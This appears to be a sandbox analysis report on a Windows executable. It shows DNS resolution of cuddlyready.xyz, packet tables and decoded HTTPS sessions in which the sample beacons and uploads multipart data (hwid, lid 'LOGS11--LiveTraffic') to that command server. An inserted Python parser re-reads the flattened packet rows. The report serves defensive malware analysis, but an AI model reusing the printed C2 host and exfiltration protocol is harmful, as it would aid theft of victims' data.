                                                                                                              Dec 23, 2024 08:35:11.429704905 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.429721117 CET49705443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.429725885 CET44349705172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.624798059 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.624910116 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:11.625026941 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.625449896 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:11.625488043 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:12.837354898 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:12.837500095 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:12.868347883 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:12.868383884 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:12.868731976 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:12.869982004 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:12.870122910 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:12.870151043 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:13.877842903 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:13.877935886 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:13.878123045 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:13.878237963 CET49706443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:13.878262997 CET44349706172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:13.994452000 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:13.994499922 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:13.994596004 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:13.994910002 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:13.994924068 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:15.205986023 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:15.206047058 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:15.207612991 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:15.207626104 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:15.207918882 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:15.209073067 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:15.209233999 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:15.209254980 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:15.209297895 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:15.255331993 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:16.157886982 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:16.157979012 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:16.158145905 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:16.158493996 CET49707443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:16.158514977 CET44349707172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:16.366607904 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:16.366664886 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:16.366766930 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:16.367063999 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:16.367074013 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:17.578216076 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:17.578298092 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:17.579574108 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:17.579588890 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:17.579819918 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:17.580935001 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:17.581057072 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:17.581078053 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:17.581149101 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:17.581160069 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:18.541824102 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:18.541925907 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:18.541980982 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:18.542120934 CET49708443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:18.542139053 CET44349708172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:19.061124086 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:19.061171055 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:19.061256886 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:19.061742067 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:19.061762094 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.274827957 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.274938107 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:20.276297092 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:20.276308060 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.276693106 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.278469086 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:20.278578997 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:20.278583050 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.955384016 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.955487967 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:20.955590963 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:20.959192991 CET49709443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:20.959208012 CET44349709172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:21.548125029 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:21.548170090 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:21.548242092 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:21.548549891 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:21.548563004 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.759706020 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.759799957 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.761528969 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.761539936 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.761792898 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.763276100 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.764065981 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.764103889 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.764390945 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.764425039 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.764621019 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.764661074 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.765762091 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.765791893 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.766028881 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.766056061 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.766208887 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.766227961 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.766235113 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.766242981 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.766377926 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.766397953 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.766419888 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.768100023 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.768136024 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.807324886 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.807531118 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.807585001 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.807616949 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.807634115 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:22.807673931 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:22.807703018 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:26.507791996 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:26.507886887 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:26.508162975 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:26.508196115 CET49711443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:26.508212090 CET44349711172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:26.543575048 CET49722443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:26.543627024 CET44349722172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:26.543719053 CET49722443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:26.544054031 CET49722443192.168.2.5172.67.150.173
                                                                                                              Dec 23, 2024 08:35:26.544069052 CET44349722172.67.150.173192.168.2.5
                                                                                                              Dec 23, 2024 08:35:27.066777945 CET49722443192.168.2.5172.67.150.173
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 23, 2024 08:35:07.092896938 CET | 56182 | 53 | 192.168.2.5 | 1.1.1.1
Dec 23, 2024 08:35:07.230468035 CET | 53 | 56182 | 1.1.1.1 | 192.168.2.5
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 23, 2024 08:35:07.092896938 CET | 192.168.2.5 | 1.1.1.1 | 0x624e | Standard query (0) | cuddlyready.xyz | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 23, 2024 08:35:07.230468035 CET | 1.1.1.1 | 192.168.2.5 | 0x624e | No error (0) | cuddlyready.xyz | | 172.67.150.173 | A (IP address) | IN (0x0001) | false
Dec 23, 2024 08:35:07.230468035 CET | 1.1.1.1 | 192.168.2.5 | 0x624e | No error (0) | cuddlyready.xyz | | 104.21.32.96 | A (IP address) | IN (0x0001) | false
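The packet rows in this report were flattened by the text extraction: timestamp, both ports and both addresses are run together ("CET49704443192.168.2.5172.67.150.173"), and a naive split is ambiguous because "44349704" is also a valid "4434" + "9704" and "192.168.2.51" + "72.67.150.173" are both valid addresses. The parser below is an added example, not code from Joe Sandbox: it enumerates every numerically valid cut of a row and keeps the one whose source or destination matches an endpoint the report itself names. KNOWN_ENDPOINTS is an assumption taken from the DNS answers and session table above (the two A records on 443 and the resolver on 53); SAMPLE_ROWS are rows copied from the tables above.

```python
"""Re-parse flattened Joe Sandbox packet rows into structured flows (added example)."""
import re
from dataclasses import dataclass
from typing import Iterator

ROW_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2} \d{1,2}, \d{4} \d{2}:\d{2}:\d{2}\.\d+ [A-Z]{3,4})"
    r"(?P<rest>\d[\d.]*)$"
)

# Assumption from this report: C2 addresses resolved for cuddlyready.xyz on
# 443 and the resolver on 53. Any other (ip, port) pair counts as unknown.
KNOWN_ENDPOINTS = {
    ("172.67.150.173", 443),
    ("104.21.32.96", 443),
    ("1.1.1.1", 53),
}

SAMPLE_ROWS = [  # copied verbatim from the report's UDP and TCP packet tables
    "Dec 23, 2024 08:35:07.092896938 CET5618253192.168.2.51.1.1.1",
    "Dec 23, 2024 08:35:07.230468035 CET53561821.1.1.1192.168.2.5",
    "Dec 23, 2024 08:35:08.458441019 CET49704443192.168.2.5172.67.150.173",
    "Dec 23, 2024 08:35:09.233123064 CET44349704172.67.150.173192.168.2.5",
    "Dec 23, 2024 08:35:09.245287895 CET49705443192.168.2.5172.67.150.173",
    "Dec 23, 2024 08:35:11.624798059 CET49706443192.168.2.5172.67.150.173",
    "Dec 23, 2024 08:35:21.548125029 CET49711443192.168.2.5172.67.150.173",
    "Dec 23, 2024 08:35:26.543575048 CET49722443192.168.2.5172.67.150.173",
]


@dataclass(frozen=True)
class Packet:
    ts: str
    src_port: int
    dst_port: int
    src_ip: str
    dst_ip: str


def _is_ipv4(s: str) -> bool:
    octets = s.split(".")
    return len(octets) == 4 and all(
        o.isdigit() and (o == "0" or o[0] != "0") and int(o) <= 255 for o in octets
    )


def _is_port(s: str) -> bool:
    return s.isdigit() and (s == "0" or s[0] != "0") and int(s) <= 65535


def _cuts(s: str, ok) -> Iterator[tuple[str, str]]:
    """Every split of s into two parts that both satisfy ok()."""
    for i in range(1, len(s)):
        a, b = s[:i], s[i:]
        if ok(a) and ok(b):
            yield a, b


def candidates(row: str) -> list[Packet]:
    """All numerically valid parses of one flattened row, before disambiguation."""
    m = ROW_RE.match(row.strip())
    if not m:
        raise ValueError(f"not a packet row: {row!r}")
    run, tail = m["rest"].split(".", 1)   # digit run before the first dot holds
    tail = "." + tail                      # both ports and the first octet of src_ip
    out = []
    for j in range(1, len(run)):           # try every boundary ports | first octet
        for sp, dp in _cuts(run[:j], _is_port):
            for sip, dip in _cuts(run[j:] + tail, _is_ipv4):
                out.append(Packet(m["ts"], int(sp), int(dp), sip, dip))
    return out


def parse_row(row: str, known=KNOWN_ENDPOINTS) -> Packet:
    """Keep the single candidate whose source or destination is a known endpoint."""
    hits = {
        c for c in candidates(row)
        if (c.src_ip, c.src_port) in known or (c.dst_ip, c.dst_port) in known
    }
    if len(hits) != 1:
        raise ValueError(f"{len(hits)} consistent parses for {row!r}")
    return hits.pop()


def client_source_ports(rows, client_ip="192.168.2.5") -> list[int]:
    """Distinct ephemeral ports used by the sandbox host: one per connection or query."""
    return sorted({p.src_port for p in map(parse_row, rows) if p.src_ip == client_ip})


if __name__ == "__main__":
    for row in SAMPLE_ROWS:
        print(parse_row(row))
    print("client ports:", client_source_ports(SAMPLE_ROWS))
```

The disambiguation step matters: without the known-endpoint filter, the 49704 row alone yields several numerically valid parses, and the loop raises rather than guessing when more than one survives. The known set should come from the same report (DNS answers, session table), not from a hard-coded C2 list, so the parser transfers to other reports.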
                                                                                                              • cuddlyready.xyz
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49704 | 172.67.150.173 | 443 | 5568 | C:\Users\user\Desktop\FjFeChttqA.exe
                                                                                                              TimestampBytes transferredDirectionData
                                                                                                              2024-12-23 07:35:08 UTC262OUTPOST /api HTTP/1.1
                                                                                                              Connection: Keep-Alive
                                                                                                              Content-Type: application/x-www-form-urlencoded
                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                              Content-Length: 8
                                                                                                              Host: cuddlyready.xyz
                                                                                                              2024-12-23 07:35:08 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                                              Data Ascii: act=life
                                                                                                              2024-12-23 07:35:09 UTC1131INHTTP/1.1 200 OK
                                                                                                              Date: Mon, 23 Dec 2024 07:35:09 GMT
                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                              Transfer-Encoding: chunked
                                                                                                              Connection: close
                                                                                                              Set-Cookie: PHPSESSID=sk4sip6caji4bgsvkb5cn29tkr; expires=Fri, 18 Apr 2025 01:21:47 GMT; Max-Age=9999999; path=/
                                                                                                              Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                              Cache-Control: no-store, no-cache, must-revalidate
                                                                                                              Pragma: no-cache
                                                                                                              X-Frame-Options: DENY
                                                                                                              X-Content-Type-Options: nosniff
                                                                                                              X-XSS-Protection: 1; mode=block
                                                                                                              cf-cache-status: DYNAMIC
                                                                                                              vary: accept-encoding
                                                                                                              Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Anw%2BT8w4ceJXwnUzQwXXMQi72A1ay6XaOI8DIYgb43Ydk3oqBQhwY3W5nlAmWJ0BH1T5vw7niPP5kmTl6o%2Fux5s8%2BeMz9MZKZnhYQ5KkJ08uSL7vj%2F38N%2Fd85w%2B%2BLpe60fo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f66ac57893dc431-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1508&min_rtt=1503&rtt_var=574&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2837&recv_bytes=906&delivery_rate=1891191&cwnd=229&unsent_bytes=0&cid=acb1fb7888e70a33&ts=788&x=0"
                                                                                                              2024-12-23 07:35:09 UTC7INData Raw: 32 0d 0a 6f 6b 0d 0a
                                                                                                              Data Ascii: 2ok
                                                                                                              2024-12-23 07:35:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                              Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
1           192.168.2.5  49705        172.67.150.173  443               5568  C:\Users\user\Desktop\FjFeChttqA.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-23 07:35:10 UTC  263                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 53
    Host: cuddlyready.xyz
2024-12-23 07:35:10 UTC  53                 OUT        Data Raw: 61 63 74 3d 72 65 63 69 76 65 5f 6d 65 73 73 61 67 65 26 76 65 72 3d 34 2e 30 26 6c 69 64 3d 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 26 6a 3d
    Data Ascii: act=recive_message&ver=4.0&lid=LOGS11--LiveTraffic&j=
2024-12-23 07:35:11 UTC  1125               IN         HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 07:35:11 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=4v12ulpekehk31rljomla4ov02; expires=Fri, 18 Apr 2025 01:21:49 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=u9IrEMAj%2F4WJSSwijV19zMBVgW23N1BxBCVomDGq7yNNpF1e9mG6esHHObzW39ZHxWC9GN4%2BWBNWNMDqYEUWoUrREOdXcLF1Lm2Pfs%2FT5vI2%2B9l1gFPPZCX7zSSKFpZHg18%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f66ac641f53de96-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1478&min_rtt=1474&rtt_var=562&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2835&recv_bytes=952&delivery_rate=1931216&cwnd=224&unsent_bytes=0&cid=a13bdf4954ff7b33&ts=780&x=0"


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
2           192.168.2.5  49706        172.67.150.173  443               5568  C:\Users\user\Desktop\FjFeChttqA.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-23 07:35:12 UTC  282                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=5JA9ZIPKI4NUP0SN8PW
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 12847
    Host: cuddlyready.xyz
2024-12-23 07:35:12 UTC  12847              OUT        Data Raw: 2d 2d 35 4a 41 39 5a 49 50 4b 49 34 4e 55 50 30 53 4e 38 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 42 35 34 37 37 34 37 37 34 42 32 41 43 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 35 4a 41 39 5a 49 50 4b 49 34 4e 55 50 30 53 4e 38 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 35 4a 41 39 5a 49 50 4b 49 34 4e 55 50 30 53 4e 38 50 57 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69
    Data Ascii: --5JA9ZIPKI4NUP0SN8PWContent-Disposition: form-data; name="hwid"4DB54774774B2ACBAC8923850305D13E--5JA9ZIPKI4NUP0SN8PWContent-Disposition: form-data; name="pid"2--5JA9ZIPKI4NUP0SN8PWContent-Disposition: form-data; name="lid"LOGS11--Li
2024-12-23 07:35:13 UTC  1131               IN         HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 07:35:13 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=pkkugrggaan3d1b12rg2rgmqt3; expires=Fri, 18 Apr 2025 01:21:52 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=FW8g86%2FYuDb5GGVo0VgakhZv3LG7yfSFJ0XJ0cxq%2Bmnz1vn%2BN9n%2F9BDgMm7Apm1V5lgUrGqauuCfyGV1Hwjat93JIk0xTqsNQEifbHIlKVct37cW%2FBIBWSZJE3u6jsVTfS0%3D"}],"group":"cf-nel","max_age":604800}
    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
    Server: cloudflare
    CF-RAY: 8f66ac726b370ca8-EWR
    alt-svc: h3=":443"; ma=86400
    server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1507&rtt_var=578&sent=9&recv=17&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13787&delivery_rate=1874197&cwnd=159&unsent_bytes=0&cid=49c4db4fd4e92dd9&ts=1046&x=0"
2024-12-23 07:35:13 UTC  20                 IN         Data Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
    Data Ascii: fok 8.46.123.189
2024-12-23 07:35:13 UTC  5                  IN         Data Raw: 30 0d 0a 0d 0a
    Data Ascii: 0


Session ID  Source IP    Source Port  Destination IP  Destination Port  PID   Process
3           192.168.2.5  49707        172.67.150.173  443               5568  C:\Users\user\Desktop\FjFeChttqA.exe

Timestamp                Bytes transferred  Direction  Data
2024-12-23 07:35:15 UTC  271                OUT        POST /api HTTP/1.1
    Connection: Keep-Alive
    Content-Type: multipart/form-data; boundary=HBCJQNWC
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
    Content-Length: 15023
    Host: cuddlyready.xyz
2024-12-23 07:35:15 UTC  15023              OUT        Data Raw: 2d 2d 48 42 43 4a 51 4e 57 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 34 44 42 35 34 37 37 34 37 37 34 42 32 41 43 42 41 43 38 39 32 33 38 35 30 33 30 35 44 31 33 45 0d 0a 2d 2d 48 42 43 4a 51 4e 57 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 48 42 43 4a 51 4e 57 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 4c 4f 47 53 31 31 2d 2d 4c 69 76 65 54 72 61 66 66 69 63 0d 0a 2d 2d 48 42 43 4a 51 4e 57 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69
    Data Ascii: --HBCJQNWCContent-Disposition: form-data; name="hwid"4DB54774774B2ACBAC8923850305D13E--HBCJQNWCContent-Disposition: form-data; name="pid"2--HBCJQNWCContent-Disposition: form-data; name="lid"LOGS11--LiveTraffic--HBCJQNWCContent-Di
2024-12-23 07:35:16 UTC  1135               IN         HTTP/1.1 200 OK
    Date: Mon, 23 Dec 2024 07:35:15 GMT
    Content-Type: text/html; charset=UTF-8
    Transfer-Encoding: chunked
    Connection: close
    Set-Cookie: PHPSESSID=7ljjujo7ti1kfct6iuqmhtj6h7; expires=Fri, 18 Apr 2025 01:21:54 GMT; Max-Age=9999999; path=/
    Expires: Thu, 19 Nov 1981 08:52:00 GMT
    Cache-Control: no-store, no-cache, must-revalidate
    Pragma: no-cache
    X-Frame-Options: DENY
    X-Content-Type-Options: nosniff
    X-XSS-Protection: 1; mode=block
    cf-cache-status: DYNAMIC
    vary: accept-encoding
    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8ItREj7wuwFFX1PTMUkmFtlUS%2BsYeGve8p1ZhOF2Exir7oysYWCcWPoKBcHppn4HQzk%2BlAFXkyNWifXkxY%2F%2BYGh2IAulSVHUhGczj2%2FHn%2F3fbKJuv6NwEWkNXO40nCL%2Bpi8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                              NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                              Server: cloudflare
                                                                                                              CF-RAY: 8f66ac810e798c0c-EWR
                                                                                                              alt-svc: h3=":443"; ma=86400
                                                                                                              server-timing: cfL4;desc="?proto=TCP&rtt=1813&min_rtt=1801&rtt_var=700&sent=10&recv=21&lost=0&retrans=0&sent_bytes=2836&recv_bytes=15952&delivery_rate=1536842&cwnd=206&unsent_bytes=0&cid=e75dff55cd351c49&ts=956&x=0"
